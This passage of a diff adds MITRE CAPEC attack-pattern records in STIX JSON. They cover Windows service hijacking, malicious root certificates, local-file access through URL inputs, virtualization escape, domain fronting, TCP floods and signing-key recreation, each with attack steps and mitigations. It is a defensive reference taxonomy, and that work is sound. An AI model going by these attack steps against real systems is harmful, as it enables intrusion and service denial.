+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the application is fully patched and does not allow the processing of unsigned data as if it is signed data.", + "id": "course-of-action--f9df8e0c-94b6-4847-ad19-ece4cc20afe0", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-477-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6679a0b9-deee-47e3-81d3-9d55d39d9207", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f9df8e0c-94b6-4847-ad19-ece4cc20afe0", + "spec_version": "2.1", + "target_ref": "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. 
The goal of this attack is to execute a malicious binary in place of an existing service.", + "external_references": [ + { + "external_id": "CAPEC-478", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/478.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Hijack Execution Flow:Service Registry Permissions Weakness", + "external_id": "T1574.011", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/011" + }, + { + "description": "Create or Modify System Process:Windows Service", + "external_id": "T1543.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543/003" + } + ], + "id": "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Modification of Windows Service Configuration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands (By altering specific configuration settings for the service, the adversary could run arbitrary code to be executed.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target system: The adversary must first determine the system they wish to modify the registry of. This needs to be a windows machine as this attack only works on the windows registry.

Experiment

  1. Gain access to the system: The adversary needs to gain access to the system in some way so that they can modify the windows registry.

  2. Techniques
    Gain physical access to a system either through shoulder surfing a password or accessing a system that is left unlocked.
    Gain remote access to a system through a variety of means.

Exploit

  1. Modify windows registry: The adversary will modify the windows registry by changing the configuration settings for a service. Specifically, the adversary will change the path settings to define a path to a malicious binary to be executed.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the capability to write to the Windows Registry on the targeted system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Usable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.", + "id": "course-of-action--25c25dbf-033d-40de-8314-255ce51d1e3d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-478-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--defdb513-7363-40a3-a5c5-41ca51464c89", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--25c25dbf-033d-40de-8314-255ce51d1e3d", + "spec_version": "2.1", + "target_ref": "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-26T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authorization and installs a new root certificate on a compromised system. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. 
When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.", + "external_references": [ + { + "external_id": "CAPEC-479", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/479.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Subvert Trust Controls:Install Root Certificate", + "external_id": "T1553.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/004" + } + ], + "id": "attack-pattern--a35eb10e-1168-4c77-8f46-87fa6ee40ef7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Malicious Root Certificate", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the ability to create a new root certificate." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack relies on client side code to access local files and resources instead of URLs. 
When the client browser is expecting a URL string, but instead receives a request for a local file, that execution is likely to occur in the browser process space with the browser's authority to local files. The attacker can send the results of this request to the local files out to a site that they control. This attack may be used to steal sensitive authentication data (either local or remote), or to gain system profile information to launch further attacks.", + "external_references": [ + { + "external_id": "CAPEC-48", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/48.html" + }, + { + "external_id": "CWE-241", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/241.html" + }, + { + "external_id": "CWE-706", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Core Concepts: Attack Patterns", + "external_id": "REF-416", + "source_name": "reference_from_CAPEC", + "url": "https://websec.io/2012/11/26/Core-Concepts-Attack-Patterns.html" + } + ], + "id": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Passing Local Filenames to Functions That Expect a URL", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n J2EE applications frequently use .properties files to store configuration information including JDBC connections, 
LDAP connection strings, proxy information, system passwords and other system metadata that is valuable to attackers looking to probe the system or bypass policy enforcement points. When these files are stored in publicly accessible directories and are allowed to be read by the public user, then an attacker can list the directory identify a .properties file and simply load its contents in the browser listing its contents. A standard Hibernate properties file contains\n hibernate.connection.driver_class = org.postgresql.Driverhibernate.connection.url = jdbc:postgresql://localhost/mydatabasehibernate.connection.username = usernamehibernate.connection.password = passwordhibernate.c3p0.min_size=5hibernate.c3p0.max_size=20\n Even if the attacker cannot write this file, there is plenty of information to leverage to gain further access.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify web application URL inputs: Review application inputs to find those that are designed to be URLs.

  2. Techniques
    Manually navigate web site pages to identify URLs.
    Use automated tools to identify URLs.

Experiment

  1. Identify URL inputs allowing local access.: Execute test local commands via each URL input to determine which are successful.

  2. Techniques
    Manually execute a local command (such as 'pwd') via the URL inputs.
    Using an automated tool, test each URL input for weakness.

Exploit

  1. Execute malicious commands: Using the identified URL inputs that allow local command execution, execute malicious commands.

  2. Techniques
    Execute local commands via the URL input.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The victim's software must not differentiate between the location and type of reference passed the client software, e.g. browser" + ], + "x_capec_skills_required": { + "Medium": "Attacker identifies known local files to exploit" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e108a43f-d09d-41e1-8c5d-d88b4e285dc8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure all configuration files and resource are either removed or protected when promoting code into production.", + "id": "course-of-action--536001f7-8712-4a06-82c7-2a5e7008aa72", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-48-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a9b80a78-9847-4310-b5a4-59689e59d949", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--536001f7-8712-4a06-82c7-2a5e7008aa72", + 
"spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--840a14c4-8158-43a5-9dbf-7913a86a244f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cf36118d-637c-4216-a672-9f18e372b78c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f3cc7fae-f66b-4499-8930-bca7d098c80c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", 
+ "id": "relationship--2e8384c4-b7dc-49d2-990a-83e058990579", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gains access to an application, service, or device with the privileges of an authorized or privileged user by escaping the confines of a virtualized environment. The adversary is then able to access resources or execute unauthorized code within the host environment, generally with the privileges of the user running the virtualized process. Successfully executing an attack of this type is often the first step in executing more complex attacks.", + "external_references": [ + { + "external_id": "CAPEC-480", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/480.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Escape to Host", + "external_id": "T1611", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1611" + } + ], + "id": "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Escaping Virtualization", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + 
"Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The adversary probes the target application, service, or device to find a possible weakness that would allow escaping the virtualized environment.

  2. Techniques
    Probing applications, services, or devices for virtualization weaknesses.

Experiment

  1. Verify the exploitable security weaknesses: Using the found weakness, the adversary attempts to escape the virtualized environment.

  2. Techniques
    Using an application weakness to escape a virtualized environment

Exploit

  1. Execute more complex attacks: Once outside of the virtualized environment, the adversary attempts to perform other more complex attacks such as accessing system resources or executing unauthorized code within the host environment.

  2. Techniques
    Executing complex attacks when given higher permissions by escaping a virtualized environment
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure virtualization software is current and up-to-date.", + "id": "course-of-action--f7d97bf5-f247-488c-9be8-811a887b8cfd", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-480-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c2cbe557-9342-4193-a6f9-e79a120bbc41", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7d97bf5-f247-488c-9be8-811a887b8cfd", + "spec_version": "2.1", + "target_ref": "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Abide by the least privilege principle to avoid assigning users more privileges than necessary.", + "id": "course-of-action--bf819a99-45a3-4059-8c63-366a7fb34b88", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-480-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--2bfc97de-cce3-45f4-b6d9-b32d60e99c84", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf819a99-45a3-4059-8c63-366a7fb34b88", + "spec_version": "2.1", + "target_ref": "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries can provide contradictory destinations when sending messages. Traffic is routed in networks using the domain names in various headers available at different levels of the OSI model. In a Content Delivery Network (CDN) multiple domains might be available, and if there are contradictory domain names provided it is possible to route traffic to an inappropriate destination. The technique, called Domain Fronting, involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. 
An alternative technique, called Domainless Fronting, is similar, but the SNI field is left blank.", + "external_references": [ + { + "external_id": "CAPEC-481", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/481.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Proxy:Domain Fronting", + "external_id": "T1090.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1090/004" + } + ], + "id": "attack-pattern--4733a63a-db36-49fa-8eba-3d5eddfe7f87", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Contradictory Destinations in Traffic Routing Schemes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary must be aware that their message will be routed using a CDN, and that both of the contradictory domains are served from that CDN.", + "If the purpose of the Domain Fronting is to hide redirected C2 traffic, the C2 server must have been created in the CDN." + ], + "x_capec_skills_required": { + "Medium": "The adversary must have some knowledge of how messages are routed." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor connections, checking headers in traffic for contradictory domain names, or empty domain names.", + "id": "course-of-action--2769b76e-88f2-4e7c-9ebb-32ab919d5fee", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-481-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32b657af-ab17-46cd-9717-b3b289f2f295", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2769b76e-88f2-4e7c-9ebb-32ab919d5fee", + "spec_version": "2.1", + "target_ref": "attack-pattern--4733a63a-db36-49fa-8eba-3d5eddfe7f87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain. 
This often involves the use of TCP SYN messages.", + "external_references": [ + { + "external_id": "CAPEC-482", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/482.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service: OS Exhaustion Flood", + "external_id": "T1499.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/001" + }, + { + "description": "Endpoint Denial of Service: Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + } + ], + "id": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "TCP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can monitor incoming packets and look for patterns in the TCP traffic to determine if the network is under an attack. 
The potential target may implement a rate limit on TCP SYN messages which would provide limited capabilities while under attack.", + "id": "course-of-action--9ba2ccdc-749a-40ac-94fe-dd01b63d365b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-482-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--927e4fec-c04f-40f4-becb-c817045ecf24", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ba2ccdc-749a-40ac-94fe-dd01b63d365b", + "spec_version": "2.1", + "target_ref": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. 
Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-484", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/484.html" + } + ], + "id": "attack-pattern--59a00678-cf9d-461d-91b6-bfa53fd4f0bb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: XML Client-Side Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obtains an authoritative or reputable signer's private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.", + "external_references": [ + { + "external_id": "CAPEC-485", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/485.html" + }, + { + "external_id": "CWE-330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html" + }, + { + "description": "Unsecure Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + }, + { + "description": "P.J. Leadbitter, D. Page, N.P. 
Smart, Attacking DSA Under a Repeated Bits Assumption, 2004--07, http://www.iacr.org/archive/ches2004/31560428/31560428.pdf", + "external_id": "REF-419", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Debian Security, DSA-1571-1 openssl -- predictable random number generator, 2008--05---13, http://www.debian.org/security/2008/dsa-1571", + "external_id": "REF-420", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoofing by Key Recreation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An authoritative signer is using a weak method of random number generation or weak signing software that causes key leakage or permits key inference.", + "An authoritative signer is using a signature algorithm with a direct weakness or with poorly chosen parameters that enable the key to be recovered using signatures from that signer." + ], + "x_capec_skills_required": { + "High": "Ability to create malformed data blobs and know how to present them directly or indirectly to a victim." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure cryptographic elements have been sufficiently tested for weaknesses.", + "id": "course-of-action--7bbe40a9-49b0-4520-838f-075ba95e1ab6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-485-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42e7e94d-1991-4bfc-ae5f-1379eb9e797a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7bbe40a9-49b0-4520-838f-075ba95e1ab6", + "spec_version": "2.1", + "target_ref": "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the UDP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. Additionally, firewalls often open a port for each UDP connection destined for a service with an open UDP port, meaning the firewalls in essence save the connection state thus the high packet nature of a UDP flood can also overwhelm resources allocated to the firewall. UDP attacks can also target services like DNS or VoIP which utilize these protocols. 
